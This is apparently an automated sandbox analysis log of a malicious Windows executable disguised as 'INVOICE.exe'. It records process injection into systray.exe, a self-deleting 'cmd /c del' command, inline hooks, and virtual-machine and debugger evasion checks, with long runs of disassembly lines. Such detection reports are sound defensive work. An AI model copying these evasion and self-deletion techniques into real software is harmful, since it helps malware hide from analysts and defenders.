          Source: C:\Users\user\Desktop\INVOICE.exeFile read: C:\Users\user\Desktop\INVOICE.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\INVOICE.exe 'C:\Users\user\Desktop\INVOICE.exe'
          Source: C:\Users\user\Desktop\INVOICE.exeProcess created: C:\Users\user\Desktop\INVOICE.exe 'C:\Users\user\Desktop\INVOICE.exe'
          Source: C:\Users\user\Desktop\INVOICE.exeProcess created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
          Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\INVOICE.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\INVOICE.exeProcess created: C:\Users\user\Desktop\INVOICE.exe 'C:\Users\user\Desktop\INVOICE.exe'
          Source: C:\Users\user\Desktop\INVOICE.exeProcess created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
          Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\INVOICE.exe'
          Source: C:\Users\user\Desktop\INVOICE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: Binary string: systray.pdb source: INVOICE.exe, 00000001.00000002.275736052.00000000007D0000.00000040.00000001.sdmp
          Source: Binary string: systray.pdbGCTL source: INVOICE.exe, 00000001.00000002.275736052.00000000007D0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: INVOICE.exe, 00000000.00000003.198125696.00000000099C0000.00000004.00000001.sdmp, INVOICE.exe, 00000001.00000002.275776991.0000000000A80000.00000040.00000001.sdmp, systray.exe, 00000008.00000002.463792021.00000000047A0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: INVOICE.exe, systray.exe

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\INVOICE.exeUnpacked PE file: 1.2.INVOICE.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 0_2_73702F60 push eax; ret
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_0041D075 push eax; ret
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_0041D0C2 push eax; ret
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_0041D0CB push eax; ret
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_0041D12C push eax; ret
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00417B70 push edi; ret
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00417CE3 push ss; iretd
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00416522 push F214C018h; ret
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_004165F8 push ss; retf
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AFD0D1 push ecx; ret
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_1_0041D075 push eax; ret
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_1_0041D0C2 push eax; ret
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_1_0041D0CB push eax; ret
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_1_0041D12C push eax; ret
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_1_00417B70 push edi; ret
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_1_00417CE3 push ss; iretd
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_1_00416522 push F214C018h; ret
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_1_004165F8 push ss; retf
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0481D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_005CD075 push eax; ret
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_005CD0CB push eax; ret
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_005CD0C2 push eax; ret
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_005CD12C push eax; ret
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_005C7B70 push edi; ret
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_005C7CE3 push ss; iretd
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_005C6522 push F214C018h; ret
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_005C65F8 push ss; retf
          Source: C:\Users\user\Desktop\INVOICE.exeFile created: C:\Users\user\AppData\Local\Temp\nsj9221.tmp\System.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x86 0x6E 0xE3
          Source: C:\Users\user\Desktop\INVOICE.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\INVOICE.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\INVOICE.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\systray.exeRDTSC instruction interceptor: First address: 00000000005B98E4 second address: 00000000005B98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\systray.exeRDTSC instruction interceptor: First address: 00000000005B9B4E second address: 00000000005B9B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\INVOICE.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00409A80 rdtsc
          Source: C:\Windows\explorer.exe TID: 3084Thread sleep time: -54000s >= -30000s
          Source: C:\Windows\SysWOW64\systray.exe TID: 6656Thread sleep time: -40000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\systray.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\systray.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 0_2_00405E61 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 0_2_0040263E FindFirstFileA,
          Source: explorer.exe, 00000003.00000000.218163712.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000003.00000000.218163712.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000003.00000000.217241090.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000003.00000000.217826846.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.210663934.0000000004E61000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}oft.Mic
          Source: explorer.exe, 00000003.00000000.238550804.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000003.00000000.218163712.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000003.00000000.218163712.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000003.00000000.218298735.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000003.00000000.211101636.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000003.00000000.217241090.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000003.00000000.217241090.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000003.00000000.217241090.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\INVOICE.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\INVOICE.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\systray.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00409A80 rdtsc
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_0040ACC0 LdrLoadDll,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AE90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ADF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ADF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ADF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AA9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B23884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B23884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AA58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AA40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AA40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AA40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B3B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ABB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ABB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ABB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ABB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B74015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B74015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B27016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B27016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B27016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B71074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B62073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AC0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AC0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B649A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B649A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B649A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B649A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AC99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AC99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AC99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AC99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AC99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AC99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AC99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AC99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AC99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AC99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AC99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AC99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B269A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ADA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AAB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AAB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AAB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B341E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AC4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AC4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AC4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AC4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AC4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AA9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AA9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AA9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AAC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AAB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AAB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ABAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ABAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ADFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ADD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ADD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B64AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B64AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B64AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B64AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B64AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B64AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B64AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B64AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B64AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B64AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B64AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B64AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B64AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B64AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AE4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AE4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B6AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B6AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AB8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AC3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AA5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AA5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AA5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AA5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AAAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AAAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AE927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B5B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B5B260 mov eax, dword ptr fs:[00000030h]
